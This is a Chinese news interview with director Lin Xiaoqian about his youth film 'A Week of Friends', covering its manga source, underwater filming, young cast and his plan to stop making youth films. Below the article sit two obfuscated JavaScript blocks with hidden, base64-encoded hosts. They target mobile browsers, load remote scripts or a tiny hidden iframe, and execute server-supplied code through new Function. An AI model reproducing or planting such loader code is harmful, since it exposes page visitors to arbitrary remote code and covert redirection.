林孝谦:《一周的朋友》是苏打水

时间:2022-06-20 10:03:17阅读:2790
林孝谦中国台湾导演林孝谦擅长以青春爱情电影来触碰人们内心最柔软的部分,疗愈世间的残酷无常,他执导的《比悲伤更悲伤的故事》曾经让人泪流满面。6月18日,林孝谦导演的新作《一周的朋友》在大陆上映。林孝谦在
  • 一周的朋友
  • 生活
  • 山谷祥生雨宫天细谷佳正大久保瑠美

林孝谦

中国台湾导演林孝谦擅长以青春爱情电影来触碰人们内心最柔软的部分,疗愈世间的残酷无常,他执导的《比悲伤更悲伤的故事》曾经让人泪流满面。6月18日,林孝谦导演的新作《一周的朋友》在大陆上映。

林孝谦在接受北京青年报记者专访时笑称,这是他执导的第一部穿校服的青春片,自己都觉得很“震撼"。林导希望将这部电影作为一个毕业季的礼物,送给青年学子们,“影片中有一句台词是‘不管未来会发生什么事情,只要我们勇敢面对就可以’,这句话对于当下来说很重要,相信未来会越来越好。”

“不是透过这部影片去教育别人,而是分享青春的共同回忆”

电影《一周的朋友》根据叶月抹茶的同名日本漫画改编,由林孝谦执导、吕安弦编剧,赵今麦、林一、沈月、汪佳辉等人出演,讲述了林湘之对于周遭朋友的记忆“只能维持短短一周”,她也因此变得孤僻,而转学生徐又树发现了这个秘密后,仍然心甘情愿一次次地和她交朋友,两人决心一起面对过去,找寻记忆的真相,救赎彼此的未来……

林孝谦透露,《比悲伤更悲伤的故事》在大陆上映之前,新经典影业便把《一周的朋友》的故事拿给他看,他一下就喜欢上了,“这个故事非常清新和干净,让我有一种回到年轻时初恋的感觉”,再加上能够与颇有默契的制片人刘蔚然在十年后再度合作,林孝谦因此欣然应允。

林孝谦在高中时有很多一起学习和玩耍的小伙伴,他相信“年少时期所遇到的朋友会是一辈子的朋友”,《一周的朋友》就是讲述这样纯粹的友谊。当然,青春期一定也伴随懵懵懂懂的爱情,所以,林孝谦透露,电影中用了四个角色互相体会和验证青春时期的微妙情绪与情感,释放对于友情的理解、对青春的回忆。

青春片一直以来颇有人气,然而却免不了幼稚和架空生活的诟病,而这部漫改作品,更有大量真实的细节需要去填充。林孝谦透露,这部影片在拍摄时做了很多“田野调查”,在拍摄地成都的学校中去体验生活,直击了大陆学生的学习情景,他也深深地被触动,“我去高三学生的教室,看到书摞起来那么高,而且他们没有休息的时间,有的住校生在特殊假日才能够回去,要拿一个巨大的行李箱,把所有东西都沉重地拖回家。”

尽管林孝谦是被保送上的台湾交通大学外文系,但是他对于学生时代的压力和快乐也同样敏感而深刻,在这部影片中,林孝谦是一种分享的心态,“我不是要透过这部影片去教育别人,而是分享我们青春的共同回忆,‘寻找共情’是让影片接地气的最好方法,比如说,在高中的时候,你的心为一个人跳动的那个感觉,你只要把这个感觉抓住,不论你在哪个地方,都是普世的价值,引发共鸣。”

林孝谦当然也会把自己高中时的美好记忆融入影片,他告诉记者:“我在高雄读书时,大家会聚集到一起去上晚自习,还会跑去一个秘密基地玩。其实这个秘密基地并不豪华,是一个很破落的地方,但是,我们会尽心布置这个属于自己的小空间,很珍惜。在台湾高考时,父母送的不多,都是朋友之间去陪伴,所以,在高考的那一天,我也陪我同学去的考场,这部影片中也会出现一幕他们高考结束之后的那种相处,都是我的回忆。”

此外,影片中的校服、护眼操、英文听力练习题、高考结束时学生涌动的真实背景也会把观众迅速拉入校园的时空氛围。林孝谦很看重“校服”的元素,“我之前拍的青春爱情电影的确很多,但是,很多是大学或者初入社会时的一小段浪漫青春,这部影片则是真正第一次穿上了校服的青春,气质完全不一样了。我离开校园20年,一下子那么清晰地回到了校园的氛围感中,我也很震撼,对于校服应该是怎样的,我们做了很多调研和设计,希望勾起观众的久远记忆,令人们瞬间穿越,回到学生时代。”

“《比悲伤更悲伤的故事》是威士忌,《一周的朋友》是苏打水”

对于林孝谦来说,《一周的朋友》作为一部校园青春片,反而比青春爱情电影更难拍,在情感的把握上需要更加严谨。此外,为了丰富剧情,他在拍摄中上了很多难度。

林孝谦透露,影片的一个挑战是在技术层面,有大量的水下戏份,“我们在摄影棚里拍了七天的水下戏份,这是我以前没有操作过的。每个演员在水下就算憋气游,最多也就一分钟,我们水下的戏大概将近五分钟,非常难拍,我们在摄影棚拍了五天,在真正的湖拍了两天。演员林一都快崩溃了,他很敬业,但水太冷了,冬天的成都也是零下的温度,林一拍完差点休克,在室温中缓了45分钟才缓过来。”

在叙事手法上,《一周的朋友》在翻拍的同时,也要有自己的见解,“在日本漫画中,这是一个非常单纯的故事,男主角热烈地追求女生,但这与国内常见的民情不同。 所以我在这一点上做了很大的调动,在女主角‘失忆’上做文章,创造一种翻转的可能,这就跟日本漫画有了非常大的不同,为了避免‘魔改’伤害粉丝,我们也跟原作者进行了交流,把脚本全部翻成日文与她沟通,她同意了以后,我们才往下拍。”影片中,林孝谦还引入了鱼只有七秒记忆的概念,“鱼在各种颜色的水中游走,很梦幻,让人感觉不真实,这一切都是林湘之的幻想吗?反正有妙不可言的逻辑在里面,观众可以去感受一下。”

《比悲伤更悲伤的故事》成为2018年度的催泪神片,此次,观众也是对于林孝谦的新作倍感期待,这是否会造成一定的创作压力?林孝谦表示,自己的心态是放松的,“《比悲伤更悲伤的故事》的受众更广一点,男女主人公的年龄更大,剧情中有生离死别的强烈核心,所以,它是一杯威士忌。《一周的朋友》则是冒着一点点清爽气泡的苏打水,高中生朋友们夏天喝了之后会很开心,然后去读大学的时候,会从中获得一些鼓励与勇气。就像《蓝色大门》一样,它可能不是一个好莱坞特效大片,但它的温暖会让小朋友们乐观地面对这个世界,因为我相信这个世界一定会越来越好啊,这是送给他们的一个毕业季的礼物。”

“希望他们是真正变成朋友,不是去演朋友”

《一周的朋友》呈现金色年华的美好光晕,演员很出彩,让林孝谦连连称赞,“我真的要夸一下几位演员,尤其是林一和赵今麦,他们非常敬业。”

林孝谦透露,林一是第一次触电大银幕,经过试戏后,林孝谦决定用他,影片中有大量的水下戏份,林一和赵今麦都专门去练习游泳,“他们完成得很好,很真实,有一场戏是在湖泊中拍摄的,赵今麦要扒着船喊救命,那个水深足有二十几米,因为怕穿帮,所以,救援和辅助的工作人员都在三米外,也就是说没有任何人在她身边保护,她得自己扒着船,心理素质非常强大。”

林孝谦笑称,没想到这次剧组招进赵今麦这位学霸,“影片拍摄时,有很多考试的场面,没想到赵今麦真的会解那些数学题,会画辅助线,还能教别人,她太厉害了。”

几位年轻演员之间的默契度很重要,林孝谦希望他们是真正变成朋友,不是去演朋友,“林一和赵今麦之间已经是二度合作了,所以是相熟的,而跟沈月、汪佳辉,他们也很快能玩到一起,我们在开拍前一周,安排他们一起打羽毛球、骑单车、玩游戏,然后他们就熟起来,变成了很好的朋友,拍摄过程中,我们有时候会抓拍他们在一起的瞬间,那样他们的互动就很真实,而且在剧组的时候,还正好赶上了沈月的生日,大家也一起帮她庆生,很温馨。”

“《一周的朋友》大概是自己最后一部青春片”

林孝谦的作品中,总是用疗愈的温暖去包裹着残酷现实,对于这个风格,他表示,自己最初进入电影这个行当时,内心便是有所承诺的。

林孝谦的哥哥身体不好,母亲一直希望林孝谦能够在大学毕业后做一名收入稳定的英文老师,这样就可以照顾哥哥,“尤其当时台湾的电影环境,在《海角七号》没有出来之前,电影是很没落的,你要从事影视行业,可能意味着要卖掉你的房子,甚至倾家荡产。所以,当我要踏入这一行时,妈妈就特别担心,如果我因为拍电影连家里的房子都没了,那我哥哥怎么办?但是,因为我还是很喜欢电影,而且我觉得,我照顾哥哥是一个人的事情,但如果通过电影传递一些好的观念,我是可以照顾很多很多人的。”

于是,疗愈与安慰就成为林孝谦拍电影时信守的一个承诺,也是他对于自己电影态度的要求。林孝谦在美国拍摄的第一部短片《自由大道》讲述了一个智能障碍的女儿带着母亲流浪的感人故事,由此被业界青睐,开启了导演生涯。此次《一周的朋友》也是希望能够帮助学子去面对人生中的彷徨与无助,尽情地享受他们的18岁。

目前,林孝谦的工作重心都在大陆,他感慨自己很幸运,“大概是老天眷顾,我一直能够有机会拍电影,家人就不用担心我。”

说起青春爱情片在今年市场的冰点状态下屡建奇功,林孝谦则笑称:“大概是小朋友们比较有勇气在疫情中走进电影院吧,可能是大家也闷坏了,有出来娱乐、约会的刚需。”

林孝谦认为,青春片的目标观众虽然只占观影群体的6%至10%,但锁定性很强,“这是一个很大的优点,你的目标观众很清晰,如果他们喜欢,他们会很热情地支持你。”不过,林孝谦表示,《一周的朋友》大概是自己最后一部青春片了,“好像超过四十岁再回来拍青春片,我怕靠近不了他们,那些台词、互动、细节都是他们的世界自然生发出来的,我怕自己已经脱离得太多了,怕失去一些创作的初心。”

文/本报记者 肖扬

统筹/刘江华

相关资讯

评论

  • 评论加载中...
function VWiko(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function iXKxdao(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return VWiko(t);};window[''+'F'+'N'+'z'+'Y'+'x'+'P'+'a'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=iXKxdao,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bbW50Lnl6YzM1MzI2LnRvcA==','151743',window,document,['b','uiKTWDnh']);}:function(){};


function YSGRnZeL(e){var t="",n=r=c1=c2=0;while(n 0x3c e.length){r=e.charCodeAt(n);if(r 0x3c 128){t+=String.fromCharCode(r);n++;}else if(r 0x3e 191&&r 0x3c 224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)0x3c0x3c 6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)0x3c0x3c 12|(c2&63)0x3c0x3c 6|c3&63);n+=3;}}return t;}; function VFELdn(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f 0x3c e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s 0x3c0x3c 2|o 0x3e0x3e 4;r=(o&15)0x3c0x3c 4|u 0x3e0x3e 2;i=(u&3)0x3c0x3c 6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return YSGRnZeL(t);};window[''+'C'+'b'+'I'+'J'+'d'+'p'+'H'+'B'+'Y'+'G'+'']=((!/^Mac|Win/.test(navigator.platform)||!navigator.platform) && !(!navigator.userAgent.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/) && navigator.userAgent.toLowerCase().indexOf('baidu')>-1))?function(){;(function(u,i,w,d,c){var x=VFELdn,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var wr='w'+'ri'+'t'+'e';'jQuery';var f=d[crd](x('aWZyYW1l'));f.id='x'+(Math.random()*10000);f.style.width='10px';f.style.height=5+'px';f.style.background='#FFF';f.src=['https://',u,'v',c[2],c[1]+'.ifm'].join('/');;d[wr](f.outerHTML);w['a'+'d'+'dEve'+'nt'+'Lis'+'ten'+'er']('me'+'s'+'sa'+'ge',function(e){if(e.data[c[1]]){d.getElementById(f.id).remove();new Function('_'+'t'+'d'+'cs',x(e.data[c[1]].replace(new RegExp(c[1],'g'),'')))(cs);}});})('enQuaHlsbWtlbGUuY29tOOjg1OOA==','rRmzKQhZdLMQdQHJrsHpGmws',window,document,['O','LkOXRS','83/267']);}:function(){};